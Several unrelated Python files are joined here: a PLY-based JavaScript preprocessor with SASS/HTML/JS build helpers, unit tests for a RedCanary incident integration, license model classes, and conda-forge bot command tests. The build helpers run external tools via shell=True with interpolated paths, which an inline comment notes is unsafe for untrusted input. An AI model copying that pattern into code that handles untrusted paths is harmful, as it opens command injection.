        charset = 'utf-8'
        for part in response.headers['content-type'].split('; '):
            match = re.match(r'^charset=(.*?)$', part)
            if match:
                charset = match.group(1)
                break
        return response.data.decode(charset)
    if filepath.startswith('/'):
        path = filepath[1:]
    else:
        path = '{0}/{1}'.format(dirpath, filepath)
    return js_processor(path, script_vars)
###############################################################################
# Lexer #######################################################################
###############################################################################
def create_lexer(file_path, script_vars):
    '''This will generate the lexer for the processor. Since this can be time
    consuming and may be called for each individual file ( to which there may
    be many ), then we'll store a lexer globally and clone it each time we need
    a new one'''
    global global_lexer
    global tokens
    dir_path = os.path.dirname(file_path)
    if global_lexer:
        # cloning the cached lexer is much cheaper than rebuilding with lex.lex()
        lexer = global_lexer.clone()
        # used when displaying syntax errors
        lexer.file_path = file_path
        # used for finding files via a relative path
        lexer.dir_path = dir_path
        # we store the variables here as they're generated
        lexer.script_vars = script_vars
        return lexer
    # buildr keywords
    reserved = {
        'begin_scope': 'SCOPE_BEGIN',
        'end_scope': 'SCOPE_END',
        'use_strict': 'USE_STRICT',
        'include': 'INCLUDE',
        'echo': 'ECHO',
    }
    # A list of js reserved ids that we'll recognise in buildr
    js_reserved = {
        'window': 'STRING',
        'undefined': 'STRING',
        '$': 'STRING'
    }
    tokens = [
        'BLOCK',
        'DELIMITER',
        'NEW_LINE',
        'COMMENT',
        'SEPARATOR',
        'LPAREN',
        'RPAREN',
        'STRING',
        'ID'] + list(reserved.values())
    t_DELIMITER = r';'
    t_SEPARATOR = r','
    # NOTE(review): this swallows the trailing newline without bumping lineno,
    # so line numbers after a comment may be off by one -- confirm.
    t_COMMENT = r'\#.*?\n'
    t_LPAREN = r'\('
    t_RPAREN = r'\)'
    def t_NEW_LINE(t):
        r'\n'
        t.lexer.lineno += 1
        return t
    # we use this to represent a block of text
    def t_BLOCK(t):
        r'%%BLOCK_BEGIN%%(\n|.)*?%%BLOCK_END%%'
        # we're only interested in the content of the block
        # TODO: move to parser
        block = r'%%BLOCK_BEGIN%%((\n|.)*?)%%BLOCK_END%%'
        t.value = re.match(block, t.value).group(1)
        t.lexer.lineno += t.value.count('\n')
        return t
    # string token processor
    def t_STRING(t):
        r'"(\\"|[^"])*?"'
        # remove the quotes and unescape the text
        # TODO: move to parser
        text = t.value[1:-1]
        t.value = text.encode().decode('unicode-escape')
        return t
    def t_ID(t):
        r'[a-zA-Z_][a-zA-Z0-9_]*'
        # cast the id to a reserved token if its found in the dict
        t.type = reserved.get(t.value, 'ID')
        if t.type != 'ID':
            return t
        # cast the id to a js_reserved token if its found in the dict
        t.type = js_reserved.get(t.value, 'ID')
        return t
    # BUG FIX: PLY's t_ignore is a *string of characters* to skip, not a regex;
    # the old value '[ \t]' also silently ignored literal '[' and ']'.
    t_ignore = ' \t'
    # error processor
    def t_error(t):
        msg = 'Unknown text "%s"' % t.value[0]
        stderr(msg)
        # BUG FIX: advance past the offending character so lexing can continue
        # (per PLY docs; without the skip the lexer stops on the first bad char).
        t.lexer.skip(1)
    global_lexer = lex.lex()
    lexer = global_lexer.clone()
    # used when displaying syntax errors
    lexer.file_path = file_path
    # used for finding files via a relative path
    lexer.dir_path = dir_path
    # we store the variables here as they're generated
    lexer.script_vars = script_vars
    return lexer
###############################################################################
# Parser ######################################################################
###############################################################################
def create_parser():
    '''This will generate the parser for the processor. Since this can be time
    consuming and may be called for each individual file ( to which there may
    be many ), then we'll store a parser globally return that every time we
    need a new one'''
    global global_parser
    global tokens
    if global_parser:
        return global_parser
    #TODO: FIX
    # calculate the distance of the lexer position from the previous new line
    # (currently unused -- kept for the error-reporting TODO above)
    def find_column(input, t):
        last_cr = input.rfind('\n', 0, t.lexpos)
        if last_cr < 0:
            last_cr = 0
        return t.lexpos - last_cr + 1
    # top level: a script is a sequence of blocks / delimiters / newlines
    def p_output(p):
        '''output : output block
                  | output delimiter
                  | output new_line
                  | block'''
        p[0] = p[1] + p[2] if len(p) > 2 else p[1]
    def p_use_scrict(p):
        '''block : USE_STRICT delimiter
                 | USE_STRICT new_line
                 | USE_STRICT block'''
        # NOTE(review): when followed by a block, that block's text (p[2]) is
        # discarded here -- confirm this is intentional.
        p[0] = '"use strict";\n'
    def p_include_1(p):
        '''block : INCLUDE string delimiter
                 | INCLUDE string new_line
                 | INCLUDE string block'''
        # TODO: actually include
        data = include_file(p[2], p.lexer.dir_path, p.lexer.script_vars)
        p[0] = '{0}\n{1}'.format(data, p[3])
    def p_echo(p):
        '''block : ECHO string delimiter
                 | ECHO string new_line
                 | ECHO string block'''
        string = p[2]
        # expand ${path} import placeholders inside the echoed string
        # TODO: move to p_string ???
        importer = r'\$\{(.*?)\}'
        while True:
            match = re.search(importer, string)
            if not match:
                break
            source, value = match.group(0), match.group(1)
            value = import_file(value, p.lexer.dir_path)
            string = string.replace(source, value, 1)
        p[0] = '{0}\n{1}'.format(string, p[3])
    ## Function scopes
    def p_begin_scope(p):
        '''begin_scope : SCOPE_BEGIN LPAREN RPAREN
                       | begin_scope_p RPAREN
                       | begin_scope new_line
                       | begin_scope delimiter'''
        p[0] = '' if len(p) == 4 else p[1]
    def p_begin_scope_p1(p):
        '''begin_scope_p : SCOPE_BEGIN LPAREN string'''
        p[0] = p[3]
    def p_begin_scope_p2(p):
        '''begin_scope_p : begin_scope_p separator string'''
        p[0] = '%s, %s' % (p[1], p[3])
    def p_end_scope(p):
        '''end_scope : SCOPE_END LPAREN RPAREN
                     | end_scope_p RPAREN'''
        p[0] = '' if len(p) == 4 else p[1]
    def p_end_scope_p1(p):
        '''end_scope_p : SCOPE_END LPAREN string'''
        p[0] = p[3]
    def p_end_scope_p2(p):
        '''end_scope_p : end_scope_p separator string'''
        p[0] = '%s, %s' % (p[1], p[3])
    # join the scopes: wrap the body in an IIFE with the collected arguments
    def p_scope(p):
        'block : begin_scope output end_scope'
        p[0] = ';(function(%s){\n%s\n})(%s);\n' % (p[1], p[2], p[3])
    def p_separator(p):
        '''separator : separator new_line
                     | SEPARATOR'''
        p[0] = ','
    def p_string(p):
        'string : STRING'
        p[0] = p[1]
    def p_block_1(p):
        'block : BLOCK'
        p[0] = p[1]
    def p_new_line(p):
        'new_line : NEW_LINE'
        p[0] = ''
    def p_delimiter(p):
        '''delimiter : DELIMITER
                     | COMMENT
                     | begin_scope end_scope''' # <-
        # an empty scope is pointless, get rid of it
        p[0] = ''
    def p_error(p):
        # BUG FIX: PLY calls p_error(None) when input ends unexpectedly; the
        # old code crashed with AttributeError instead of reporting the error.
        if p is None:
            sys.stderr.write('Syntax error: unexpected end of input\n')
            return
        # msg = repr( dir( p ) )
        msg = 'Syntax error: unexpected {0} "{1}" in {2} line {3}\n'.format(
            p.type, p.value, p.lexer.file_path, p.lineno)
        sys.stderr.write(msg)
    # TODO: if ( debug )
    global_parser = yacc.yacc()
    return global_parser
###############################################################################
# Default Processor ###########################################################
###############################################################################
def default_processor(file_path, script_vars=None, compress=False):
    '''Fallback processor for unrecognised file types; not yet implemented,
    always returns an empty string. (Mutable {} default replaced with None.)'''
    return ''
###############################################################################
# SASS Application ############################################################
###############################################################################
def call_sass(params):
    """Run the external `sass` command with *params* (a list of argument
    strings) and return its stdout decoded as UTF-8."""
    cmd = 'sass {0}'.format(' '.join(params))
    # NOTE(review): shell=True with string interpolation is fine for the fixed
    # flags used here, but unsafe for untrusted paths -- confirm callers.
    proc = sp.Popen(cmd, stdout=sp.PIPE, stdin=sp.PIPE, shell=True)
    output, error = proc.communicate()
    return output.decode('utf-8')
###############################################################################
# SASS Processor ##############################################################
###############################################################################
def sass_processor(file_path, script_vars=None, compress=False):
    '''This require ruby and sass to be installed.

    Compile *file_path* with the external sass tool; when *compress* is set,
    pass `-t compressed` and strip the newlines sass leaves behind.
    (Mutable {} default replaced with None; the parameter is unused here.)
    '''
    params = []
    if compress:
        params.append('-t compressed')
    params.append(file_path)
    css = call_sass(params)
    # sass leaves a trailing \n
    if compress:
        css = css.replace('\n', '')
    return css
###############################################################################
# SVG Processor ###############################################################
###############################################################################
def svg_processor(file_path, script_vars=None, compress=False):
    '''Read an SVG file and return its markup, stripped of newlines when
    *compress* is set. *script_vars* is accepted for router compatibility
    but unused.'''
    try:
        # close the handle deterministically instead of leaking it
        with open(file_path, 'r') as handle:
            svg = handle.read()
    except (OSError, IOError) as e:
        # BUG FIX: the original called sys.stderr(repr(e), 1) -- a file object
        # is not callable; use the stderr() helper (exit status 1) as
        # html_processor does.
        stderr(repr(e), 1)
    if compress:
        #TODO: work out some better compression if possible
        svg = svg.replace('\n', '').replace('\r', '')
    return svg
###############################################################################
# HTML Processor ##############################################################
###############################################################################
def html_processor(file_path, script_vars=None, compress=False):
    '''Read an HTML file and return its source; when *compress* is set, pipe
    it through the bundled html-compressor (requires java installed).'''
    # TODO: Do some actual processing ( maybe use bottles preprocessor )
    try:
        # close the handle deterministically instead of leaking it
        with open(file_path, 'r') as handle:
            source = handle.read()
    except (OSError, IOError) as e:
        stderr(repr(e), 1)
    if compress:
        # we'll use the html compressor in /tools
        cmd = 'java -jar {0}/tools/html-compressor/htmlcompressor-1.5.3.jar' \
            .format(os.path.dirname(__file__))
        proc = sp.Popen(cmd, stdout=sp.PIPE, stdin=sp.PIPE, shell=True)
        proc.stdin.write(source.encode())
        output, error = proc.communicate()
        source = output.decode('utf-8')
    return source
###############################################################################
# CSS Processor ###############################################################
###############################################################################
def css_processor(file_path, script_vars=None, compress=False):
    '''Not yet implemented; always returns an empty string.
    (Mutable {} default replaced with None, matching the other processors.)'''
    return ''
###############################################################################
# JS Processor ################################################################
###############################################################################
def js_processor(file_path, script_vars=None, compress=False):
    '''Process a given source file, returning the processed JS. the optional
    vars allow for variables not present in the script to be passed in to the
    processor. By default compression is not carried out and single quotes/new
    lines are not escaped. compression should be enabled only at the top level
    and escaping should only be performed where the result will be inserted
    into a string'''
    # todo should strings be completely escaped or not?
    # BUG FIX: the old {} default was attached to the lexer (lexer.script_vars)
    # and mutated during parsing, leaking variables between unrelated calls.
    if script_vars is None:
        script_vars = {}
    lexer = create_lexer(file_path, script_vars)
    parser = create_parser()
    try:
        # close the handle deterministically instead of leaking it
        with open(file_path, 'r') as handle:
            source = handle.read()
    except (OSError, IOError) as e:
        stderr(repr(e), 1)
    code = enclose_js(source)
    code = parser.parse(code, lexer=lexer)
    if compress:
        cmd = 'java -jar {0}/tools/yui-compressor/yuicompressor-2.4.8.jar --type js' \
            .format(os.path.dirname(__file__))
        proc = sp.Popen(cmd, stdout=sp.PIPE, stdin=sp.PIPE, shell=True)
        proc.stdin.write(code.encode())
        output, error = proc.communicate()
        code = output.decode('utf-8')
    return code
# TODO: use a tokenising switcher in the lexer
def enclose_js(source):
    '''In order to aid tokenising we'll wrap the JS code in a JS block and
    remove the preprocessor code from the block by finding it and replacing the
    comment tokens with block tokens. We're effectively inverting the code from
    JS code with buildr blocks to buildr code with JS blocks'''
    # wrap all the code ( useful for when there is no buildr code )
    code = '%%BLOCK_BEGIN%%{0}%%BLOCK_END%%'.format(source)
    # lift every /*## ... */ buildr comment out of the surrounding JS block
    pattern = r'/\*##(.*?)\*/'
    wrapper = '%%BLOCK_END%%{0}%%BLOCK_BEGIN%%'
    match = re.search(pattern, code, re.DOTALL)
    while match:
        code = code.replace(match.group(0), wrapper.format(match.group(1)), 1)
        match = re.search(pattern, code, re.DOTALL)
    # same for //## line comments; the newline stays outside the buildr block
    pattern = r'//##(.*?)\n'
    wrapper = '%%BLOCK_END%%{0}\n%%BLOCK_BEGIN%%'
    match = re.search(pattern, code)
    while match:
        code = code.replace(match.group(0), wrapper.format(match.group(1)), 1)
        match = re.search(pattern, code)
    return code
| |
import demistomock as demisto
import json
import RedCanary
# Initial last-run state: fetch start time plus ids of already-seen events.
last_run_dict = {"time": "2019-12-13T17:23:22Z", "last_event_ids": []}
# Occurrence time of the newest detection in each incidents fixture file.
latest_time_of_occurrence_of_incidents1 = "2019-12-30T22:00:50Z"
latest_time_of_occurrence_of_incidents2 = "2020-12-25T02:07:37Z"
# Number of detections expected from TestData/incidents.json.
number_of_incidents = 3
class Mocker:
    """Stub that alternates between two canned responses on successive calls.

    Simulates an API returning the same payload on different pages: the
    counter advances on every execute(); even calls yield res1, odd calls
    yield res2 (module-level fixtures).
    """

    def __init__(self):
        self.counter = 0
        self.res1 = res1
        self.res2 = res2

    def execute(self):
        self.counter += 1
        return self.res1 if self.counter % 2 == 0 else self.res2
# Canned API fixtures used by the tests below.
with open("./TestData/incidents.json") as f:
    data = json.load(f)  # detections for the initial fetch
with open("TestData/incidents2.json") as f2:
    data2 = json.load(f2)  # detections for a follow-up fetch (one new incident)
with open("./TestData/get_full_timeline_raw1.json") as f3:
    res1 = json.load(f3)  # timeline page payload, variant 1
with open("./TestData/get_full_timeline_raw2.json") as f4:
    res2 = json.load(f4)  # timeline page payload, variant 2 (same 'data' field)
def test_fetch_when_last_run_is_time(mocker):
    """Unit test
    Given
    - raw response of the http request
    When
    - fetching incidents
    Then
    - the expected number of incidents is created and last_run carries the
      occurrence time of the newest incident
    """
    for method in ("incidents", "setLastRun", "getLastRun"):
        mocker.patch.object(demisto, method)
    mocker.patch.object(
        RedCanary, "get_unacknowledged_detections", return_value=data["data"]
    )
    mocker.patch.object(RedCanary, "get_full_timeline", return_value=None)
    last_run, incidents = RedCanary.fetch_incidents(last_run_dict)
    assert len(incidents) == number_of_incidents
    assert last_run["time"] == latest_time_of_occurrence_of_incidents1
def test_get_endpoint_context():
    """
    Given:
        - Endpoint data with missing MAC address details (None)
    When:
        - Listing endpoints and generating endpoint standard context
    Then:
        - Ensure get_endpoint_context runs successfully
        - Verify expected endpoint standard context is returned
    """
    endpoint = [
        {
            'id': '1234',
            'attributes': {
                'hostname': 'hostname1',
                'platform': 'OS X',
                'operating_system': 'Mac OSX 10.14.6',
                'is_isolated': False,
                'is_decommissioned': False,
                'endpoint_network_addresses': [
                    # first address entry: complete IP + MAC details
                    {
                        'attributes': {
                            'ip_address': {
                                'attributes': {
                                    'ip_address_matches_rfc_1918?': True,
                                    'ip_address_reverse_dns': None,
                                    'ip_address_defanged': '192.169.1[.]16',
                                    'ip_address_is_link_local?': False,
                                    'ip_address_matches_rfc_4193?': False,
                                    'ip_address': '192.169.1.16'
                                },
                                'type': 'primitives.IpAddress'
                            },
                            'mac_address': {
                                'attributes': {
                                    'address': 'g9:gg:c2:0f:3d:5f'
                                },
                                'type': 'primitives.MacAddress'
                            }
                        }
                    },
                    # second address entry: MAC details absent (None) -- the
                    # regression under test
                    {
                        'attributes': {
                            'ip_address': {
                                'attributes': {
                                    'ip_address_matches_rfc_1918?': False,
                                    'ip_address_reverse_dns': None,
                                    'ip_address_defanged': '100.144.153[.]501',
                                    'ip_address_is_link_local?': False,
                                    'ip_address_matches_rfc_4193?': False,
                                    'ip_address': '100.144.153.501'
                                },
                                'type': 'primitives.IpAddress'
                            },
                            'mac_address': None
                        }
                    }
                ]
            }
        }
    ]
    endpoint_context = RedCanary.get_endpoint_context(endpoint)
    # both IPs are collected; only the non-None MAC appears in the context
    assert endpoint_context == [{
        'Hostname': 'hostname1',
        'ID': '1234',
        'IPAddress': ['192.169.1.16', '100.144.153.501'],
        'IsDecommissioned': False,
        'IsIsolated': False,
        'MACAddress': ['g9:gg:c2:0f:3d:5f'],
        'OS': 'OS X',
        'OSVersion': 'Mac OSX 10.14.6'}]
def test_fetch_multiple_times_when_already_fetched_incident_keep(mocker):
    """Unit test
    Given
    - raw response of the http request
    When
    - fetching incidents several times with the same detections
    Then
    - the first fetch creates all incidents; subsequent fetches see the same
      detections but create no new incidents and leave last_run unchanged
    """
    mocker.patch.object(demisto, "incidents")
    mocker.patch.object(demisto, "setLastRun")
    mocker.patch.object(demisto, "getLastRun")
    mocker.patch.object(RedCanary, "get_unacknowledged_detections", return_value=data["data"])
    mocker.patch.object(RedCanary, "get_full_timeline", return_value=None)
    # fetching for the first time
    # CONSISTENCY: use the module constants (as test_fetch_when_last_run_is_time
    # does) instead of repeating the magic literals 3 / "2019-12-30T22:00:50Z"
    last_run, incidents = RedCanary.fetch_incidents(last_run_dict)
    assert len(incidents) == number_of_incidents
    assert last_run["time"] == latest_time_of_occurrence_of_incidents1
    # fetching for the second and third time: nothing new
    for _ in range(2):
        last_run, incidents = RedCanary.fetch_incidents(last_run)
        assert len(incidents) == 0
        assert last_run["time"] == latest_time_of_occurrence_of_incidents1
def test_fetch_multiple_times_with_new_incidents(mocker):
    """Unit test
    Given
    - raw response of the http request
    When
    - fetching incidents a second time with a payload containing one already
      seen incident and one new incident
    Then
    - only the unseen incident is created, and last_run advances to the
      newest occurrence time
    """
    mocker.patch.object(demisto, "incidents")
    mocker.patch.object(demisto, "setLastRun")
    mocker.patch.object(demisto, "getLastRun")
    mocker.patch.object(RedCanary, "get_unacknowledged_detections", return_value=data["data"])
    mocker.patch.object(RedCanary, "get_full_timeline", return_value=None)
    # fetching for the first time
    # CONSISTENCY: use the module constants instead of the magic literals
    # 3 / "2019-12-30T22:00:50Z" duplicated from the fixtures
    last_run, incidents = RedCanary.fetch_incidents(last_run_dict)
    assert len(incidents) == number_of_incidents
    assert last_run["time"] == latest_time_of_occurrence_of_incidents1
    # fetching for the second time
    mocker.patch.object(RedCanary, "get_unacknowledged_detections", return_value=data2["data"])
    last_run, incidents = RedCanary.fetch_incidents(last_run)
    # only one incidents is being created out of the 2 that were fetched
    assert len(incidents) == 1
    assert last_run["time"] == latest_time_of_occurrence_of_incidents2
def test_def_get_full_timeline(mocker):
    """Unit test
    Given
    - raw response of the http request from 2 different requests
    - the data is the same but the page number is different
    When
    - keep getting the same data in different pages
    Then
    make sure the loop stops and doesn't cause a timeout
    """
    response = Mocker()
    # NOTE(review): return_value=response.execute() calls execute() ONCE, so
    # http_get returns the identical payload on every call; if a per-call
    # payload was intended, side_effect=response.execute would be needed.
    # The identical-payload behaviour is what exercises the loop guard here.
    mocker.patch.object(RedCanary, "http_get", return_value=response.execute())
    activities = RedCanary.get_full_timeline(1)
    result1 = response.execute()
    result2 = response.execute()
    # make sure the results are not the same, they are from different pages, but the data is
    assert not result1 == result2
    assert result1['data'] == result2['data']
    # make sure the loop ends
    assert activities
| |
# License models
from le_utils.constants import licenses
from .. import config
from ..exceptions import UnknownLicenseError
def get_license(license_id, copyright_holder=None, description=None):
    """Instantiate the License subclass matching *license_id*.

    :param license_id: one of the le_utils.constants.licenses ids
    :param copyright_holder: name of the person/organization owning the license
    :param description: license description (used by special-permissions only)
    :raises UnknownLicenseError: if license_id is not a recognised id
    """
    # special permissions is the only license that carries a description
    if license_id == licenses.SPECIAL_PERMISSIONS:
        return SpecialPermissionsLicense(
            copyright_holder=copyright_holder, description=description
        )
    # IDIOM: dispatch table instead of a long if/elif chain
    license_classes = {
        licenses.CC_BY: CC_BYLicense,
        licenses.CC_BY_SA: CC_BY_SALicense,
        licenses.CC_BY_ND: CC_BY_NDLicense,
        licenses.CC_BY_NC: CC_BY_NCLicense,
        licenses.CC_BY_NC_SA: CC_BY_NC_SALicense,
        licenses.CC_BY_NC_ND: CC_BY_NC_NDLicense,
        licenses.ALL_RIGHTS_RESERVED: AllRightsLicense,
        licenses.PUBLIC_DOMAIN: PublicDomainLicense,
    }
    license_class = license_classes.get(license_id)
    if license_class is None:
        raise UnknownLicenseError(
            "{} is not a valid license id. (Valid license are {})".format(
                license_id, [l[0] for l in licenses.choices]
            )
        )
    return license_class(copyright_holder=copyright_holder)
class License(object):
    """Base class for all license types uploaded with content.

    Subclasses set ``license_id`` (an le_utils.constants.licenses id) and may
    relax ``require_copyright_holder``.
    """

    license_id = None  # (str): content's license based on le_utils.constants.licenses
    copyright_holder = None  # (str): name of person or organization who owns license (optional)
    description = None  # (str): description of the license (optional)
    require_copyright_holder = True

    def __init__(self, copyright_holder=None, description=None):
        self.copyright_holder = copyright_holder or ""
        self.description = description

    def get_id(self):
        """Return the le_utils license id for this license type."""
        return self.license_id

    def validate(self):
        """Assert the copyright holder is present (when required) and a string."""
        holder_ok = not self.require_copyright_holder or self.copyright_holder != ""
        assert holder_ok, "Assertion Failed: {} License requires a copyright holder".format(
            self.license_id
        )
        assert isinstance(
            self.copyright_holder, str
        ), "Assertion Failed: Copyright holder must be a string"

    def truncate_fields(self):
        """Clip description and copyright holder to the configured maximum
        lengths, logging any truncation via config.print_truncate."""
        max_description = config.MAX_LICENSE_DESCRIPTION_LENGTH
        if self.description and len(self.description) > max_description:
            config.print_truncate(
                "license_description", self.license_id, self.description
            )
            self.description = self.description[:max_description]
        max_holder = config.MAX_COPYRIGHT_HOLDER_LENGTH
        if self.copyright_holder and len(self.copyright_holder) > max_holder:
            config.print_truncate(
                "copyright_holder", self.license_id, self.copyright_holder
            )
            self.copyright_holder = self.copyright_holder[:max_holder]

    def as_dict(self):
        """Return the license fields as a plain dict for serialization."""
        return {
            "license_id": self.license_id,
            "copyright_holder": self.copyright_holder,
            "description": self.description,
        }
class CC_BYLicense(License):
    """
    The Attribution License lets others distribute, remix, tweak,
    and build upon your work, even commercially, as long as they credit
    you for the original creation. This is the most accommodating of
    licenses offered. Recommended for maximum dissemination and use of
    licensed materials.
    Reference: https://creativecommons.org/licenses/by/4.0
    """
    license_id = licenses.CC_BY  # le_utils constant identifying this license
class CC_BY_SALicense(License):
    """
    The Attribution-ShareAlike License lets others remix, tweak, and
    build upon your work even for commercial purposes, as long as they
    credit you and license their new creations under the identical terms.
    This license is often compared to "copyleft" free and open source
    software licenses. All new works based on yours will carry the same
    license, so any derivatives will also allow commercial use. This is
    the license used by Wikipedia, and is recommended for materials that
    would benefit from incorporating content from Wikipedia and similarly
    licensed projects.
    Reference: https://creativecommons.org/licenses/by-sa/4.0
    """
    license_id = licenses.CC_BY_SA  # le_utils constant identifying this license
class CC_BY_NDLicense(License):
    """
    The Attribution-NoDerivs License allows for redistribution, commercial
    and non-commercial, as long as it is passed along unchanged and in
    whole, with credit to you.
    Reference: https://creativecommons.org/licenses/by-nd/4.0
    """
    license_id = licenses.CC_BY_ND  # le_utils constant identifying this license
class CC_BY_NCLicense(License):
    """
    The Attribution-NonCommercial License lets others remix, tweak, and
    build upon your work non-commercially, and although their new works
    must also acknowledge you and be non-commercial, they don't have to
    license their derivative works on the same terms.
    Reference: https://creativecommons.org/licenses/by-nc/4.0
    """
    license_id = licenses.CC_BY_NC  # le_utils constant identifying this license
class CC_BY_NC_SALicense(License):
    """
    The Attribution-NonCommercial-ShareAlike License lets others remix, tweak,
    and build upon your work non-commercially, as long as they credit you and
    license their new creations under the identical terms.
    Reference: https://creativecommons.org/licenses/by-nc-sa/4.0
    """
    license_id = licenses.CC_BY_NC_SA  # le_utils constant identifying this license
class CC_BY_NC_NDLicense(License):
    """
    The Attribution-NonCommercial-NoDerivs License is the most restrictive of
    our six main licenses, only allowing others to download your works and share
    them with others as long as they credit you, but they can't change them in
    any way or use them commercially.
    Reference: https://creativecommons.org/licenses/by-nc-nd/4.0
    """
    license_id = licenses.CC_BY_NC_ND  # le_utils constant identifying this license
class AllRightsLicense(License):
    """
    The All Rights Reserved License indicates that the copyright holder reserves,
    or holds for their own use, all the rights provided by copyright law under
    one specific copyright treaty.
    Reference: http://www.allrights-reserved.com
    """
    license_id = licenses.ALL_RIGHTS_RESERVED  # le_utils constant identifying this license
class PublicDomainLicense(License):
    """
    Public Domain work has been identified as being free of known restrictions
    under copyright law, including all related and neighboring rights.
    Reference: https://creativecommons.org/publicdomain/mark/1.0
    """
    # public-domain works have no owner, so no copyright holder is required
    require_copyright_holder = False
    license_id = licenses.PUBLIC_DOMAIN  # le_utils constant identifying this license
class SpecialPermissionsLicense(License):
    """
    Special Permissions is a custom license to use when the current licenses
    do not apply to the content. The owner of this license is responsible for
    creating a description of what this license entails.
    """
    license_id = licenses.SPECIAL_PERMISSIONS  # le_utils constant identifying this license
    def __init__(self, copyright_holder=None, description=None):
        # NOTE(review): assert is stripped under `python -O`; raising ValueError
        # would be more robust, but callers may currently catch AssertionError.
        assert description, "Special Permissions licenses must have a description"
        super(SpecialPermissionsLicense, self).__init__(
            copyright_holder=copyright_holder, description=description
        )
| |
import os
import unittest
try:
import unittest.mock as mock
except ImportError:
import mock
from requests.exceptions import RequestException
from conda_forge_webservices.commands import (
pr_detailed_comment as _pr_detailed_comment,
issue_comment as _issue_comment)
def pr_detailed_comment(comment, org_name='conda-forge',
                        repo_name='python-feedstock', pr_repo=None,
                        pr_owner='some-user', pr_branch='master', pr_num=1):
    """Test convenience wrapper around commands.pr_detailed_comment.

    ``pr_repo`` defaults to ``repo_name`` when not supplied.
    """
    repo_of_pr = repo_name if pr_repo is None else pr_repo
    return _pr_detailed_comment(org_name, repo_name, pr_owner, repo_of_pr,
                                pr_branch, pr_num, comment)
def issue_comment(title, comment, issue_num=1,
                  org_name='conda-forge', repo_name='python-feedstock'):
    """Test convenience wrapper around commands.issue_comment with defaults
    suitable for these unit tests."""
    return _issue_comment(org_name, repo_name, issue_num, title, comment)
class TestCommands(unittest.TestCase):
    """Exercise the webservices command dispatch against fully mocked
    GitHub/git backends.

    Each test drives the command parser with many comment phrasings and
    asserts that exactly the intended mocked command fires.
    """

    def setUp(self):
        # The GitHub API is mocked, but the code under test still reads a
        # token from the environment — inject a dummy one if absent.
        if 'GH_TOKEN' not in os.environ:
            os.environ['GH_TOKEN'] = 'fake'  # github access is mocked anyway
            self.kill_token = True
        else:
            self.kill_token = False

    def tearDown(self):
        # Remove the token only if setUp injected it.
        if self.kill_token:
            del os.environ['GH_TOKEN']

    @mock.patch('conda_forge_webservices.commands.add_bot_rerun_label')
    @mock.patch('conda_forge_webservices.commands.rerender')
    @mock.patch('conda_forge_webservices.commands.make_noarch')
    @mock.patch('conda_forge_webservices.commands.relint')
    @mock.patch('conda_forge_webservices.commands.update_team')
    @mock.patch('conda_forge_webservices.commands.update_circle')
    @mock.patch('conda_forge_webservices.commands.update_cb3')
    @mock.patch('github.Github')
    @mock.patch('conda_forge_webservices.commands.Repo')
    def test_pr_command_triggers(
            self, repo, gh, update_cb3, update_circle,
            update_team, relint, make_noarch, rerender, add_bot_rerun_label):
        """Each PR-comment phrasing triggers (only) its intended command."""
        update_cb3.return_value = (True, "hi")

        # Entries are (mocked command, also allowed on staged-recipes?,
        # phrasings that must trigger it, phrasings that must not).
        commands = [
            (rerender, False, [
                '@conda-forge-admin, please rerender',
                '@conda-forge-admin, rerender',
                '@conda-forge-admin, re-render',
                '@conda-forge-admin, please re-render',
                '@conda-forge-admin: PLEASE RERENDER',
                '@conda-forge-admin: RERENDER',
                'something something. @conda-forge-admin: please re-render',
                'something something. @conda-forge-admin: re-render',
            ], [
                '@conda-forge admin is pretty cool. please rerender for me?',
                '@conda-forge admin is pretty cool. rerender for me?',
                '@conda-forge-admin, go ahead and rerender for me',
                'please re-render, @conda-forge-admin',
                're-render, @conda-forge-admin',
                '@conda-forge-linter, please lint',
                '@conda-forge-linter, lint',
            ]),
            (make_noarch, False, [
                '@conda-forge-admin, please add noarch python',
                '@conda-forge-admin, add noarch python',
                (
                    '@conda-forge-linter, please lint, and @conda-forge-admin, '
                    'please make `noarch: python`'
                ),
                (
                    '@conda-forge-linter, lint, and @conda-forge-admin, make '
                    '`noarch: python`'
                ),
                '@CONDA-FORGE-ADMIN please add `noarch python`',
                '@CONDA-FORGE-ADMIN add `noarch python`',
                'hey @conda-forge-admin : please make noarch: python',
                'hey @conda-forge-admin : make noarch: python',
            ], [
                '@conda-forge-linter, please lint',
                '@conda-forge-linter, lint',
                'sure wish @conda-forge-admin would please add noarch python',
                'sure wish @conda-forge-admin would add noarch python',
            ]),
            (update_cb3, False, [
                '@conda-forge-admin, please update for CB3',
                '@conda-forge-admin, please update for conda-build 3',
                '@conda-forge-admin, update for CB3',
                '@conda-forge-admin, update for conda-build 3',
            ], [
                # BUG FIX: a missing trailing comma used to concatenate these
                # two literals into a single merged string, so only one bogus
                # message was actually exercised instead of two.
                '@conda-forge-admin, please lint',
                '@conda-forge-admin, lint'
            ]),
            (relint, True, [
                '@conda-forge-admin, please lint',
                '@conda-forge-admin, lint',
                '@CONDA-FORGE-LINTER, please relint',
                '@CONDA-FORGE-LINTER, relint',
                'hey @conda-forge-linter please re-lint!',
                'hey @conda-forge-linter re-lint!',
            ], [
                '@conda-forge-admin should probably lint again',
            ]),
            (add_bot_rerun_label, False, [
                '@conda-forge-admin, please rerun the bot',
                '@conda-forge-admin, rerun the bot',
                '@conda-forge-admin, please rerun bot',
                '@conda-forge-admin, rerun bot',
                '@conda-forge-admin: RERUN BOT',
                'something something. @conda-forge-admin: please rerun bot',
            ], [
                '@conda-forge admin is pretty cool. please rerun bot for me?',
                '@conda-forge admin is pretty cool. rerun the bot for me?',
                '@conda-forge-admin, go ahead and rerun the bot for me',
                'please rerun the bot, @conda-forge-admin',
                'rerun bot, @conda-forge-admin',
            ]),
        ]

        for command, on_sr, should, should_not in commands:
            for msg in should:
                command.reset_mock()
                print(msg, end=' ' * 30 + '\r')
                pr_detailed_comment(msg)
                command.assert_called()

                # Commands only fire on staged-recipes when explicitly allowed.
                command.reset_mock()
                print(msg, end=' ' * 30 + '\r')
                pr_detailed_comment(msg, repo_name='staged-recipes')
                if on_sr:
                    command.assert_called()
                else:
                    command.assert_not_called()

            for msg in should_not:
                command.reset_mock()
                print(msg, end=' ' * 30 + '\r')
                pr_detailed_comment(msg)
                command.assert_not_called()

    @mock.patch('conda_forge_webservices.commands.add_user')
    @mock.patch('conda_forge_webservices.commands.add_py')
    @mock.patch('conda_forge_webservices.commands.make_rerender_dummy_commit')
    @mock.patch('conda_forge_webservices.commands.add_bot_automerge')
    @mock.patch('conda_forge_webservices.commands.rerender')
    @mock.patch('conda_forge_webservices.commands.make_noarch')
    @mock.patch('conda_forge_webservices.commands.relint')
